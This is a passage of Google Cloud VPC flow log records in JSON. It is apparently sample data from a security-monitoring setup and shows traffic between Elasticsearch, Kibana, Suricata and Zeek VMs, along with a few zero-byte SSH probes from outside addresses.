.553477088Z"} 
-{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.0.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"203.0.113.134","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"203.0.113.134","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"203.0.113.134","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"203.0.113.58","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"203.0.113.134","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.27","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_nam
e":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.27","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"198.51.100.88","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
